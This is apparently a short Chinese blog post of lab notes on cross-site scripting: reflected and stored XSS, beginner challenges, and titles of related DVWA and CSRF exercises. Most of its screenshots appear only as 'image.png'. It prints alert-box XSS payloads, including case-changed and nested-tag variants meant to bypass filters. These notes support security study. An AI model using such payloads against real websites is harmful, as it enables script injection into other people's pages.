跨站脚本攻击

2017-11-24 本文已影响0人疯帮主

反射型
<script>alert("xss")</script>
存储型
1.字数不限制时

image.png
2.字数限制时（分两步，留言两次）
先铺垫
image.png
再合并
image.png
3.结果
image.png
image.png
初级挑战
1.Exampe1
源码：

image.png
<script>alert("xss")</script>

image.png
2.Exampe1
源码：
image.png
<Script>alert("xss")</Script>
image.png
3.Exampe1
源码：
image.png
<scr<script>ipt>alert("xss")</sc</script>ript>
image.png
中级挑战
高级挑战
DVWA之反射型XSS
DVWA之存储型XSS
Csrf利用管理员权限创建后台管理账户
DVWA之CSRF